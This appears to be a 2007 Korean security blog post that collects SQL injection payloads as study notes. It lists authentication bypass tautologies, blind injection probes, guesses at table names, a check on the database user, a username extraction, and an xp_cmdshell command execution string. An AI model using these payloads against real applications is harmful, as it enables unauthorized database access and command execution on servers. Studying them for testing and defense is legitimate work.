본문 바로가기
Security

SQL Injection Code 정리

by Hide­ 2007. 3. 24.
반응형

SQL Injection은 각 DB와 개발 언어에서 사용하는 SQL 언어에 따라 다소 차이가 납니다만,

나름 정리된 자료 올립니다.


그럼, 공부에 참고하시길....


===========================================================================================


1. 일반적인 SQL Injection
    1 OR 1=1
    1' OR '1'='1
    '1 OR '1=1 --
    ' or 1=1 ; --
    ' or 1=1 --
    A' or 'A'='A


2. Blind SQL Injection 시 현재 사용 중인 Encapsulating Quites를 알아 내기 위한 에러 유발
    1'1


3. EXEC를 사용하여 에러를 유발하는 Blind SQL Injection
    1 EXEC SP_(or EXEC XP_)


4. Blind SQL Injection
    1 AND 1=1


5. Table 이름을 찾기 위한 Blind SQL Injection. 일반적으로 아래 tablenames에 추측 가능한
    테이블 이름이나, Brute Force를 수행함.
    1' AND 1=(SELECT COUNT(*) FROM tablenames);


6. 알고 있는 사용자가 administrator로 Running하고 있는지 확인
    1 AND USER_NAME() = 'dbo'


7.  Blind SQL Injection을 위한 에러 유발 코드
     1\'1


8. Blind SQL Injection을 위해 존재하지 않는 테이블을 호출함으로써 에러를 유발
    1' AND non_existant_table = '1


9. username 추출
    ' OR username IS NOT NULL OR username = '


10.  프로그램 실행
     ; exec master..xp_cmdshell 'ifconfig'--


출처 : securityplus

'Security' 카테고리의 다른 글

Down it  (0) 2007.03.31
Netcat 을 이용한 웹해킹  (0) 2007.03.28
Oldzombie's Wargame tut 1-8  (0) 2007.03.21
스테가노툴 - stools  (0) 2007.03.20
스테가노툴 - Hide in picture  (0) 2007.03.20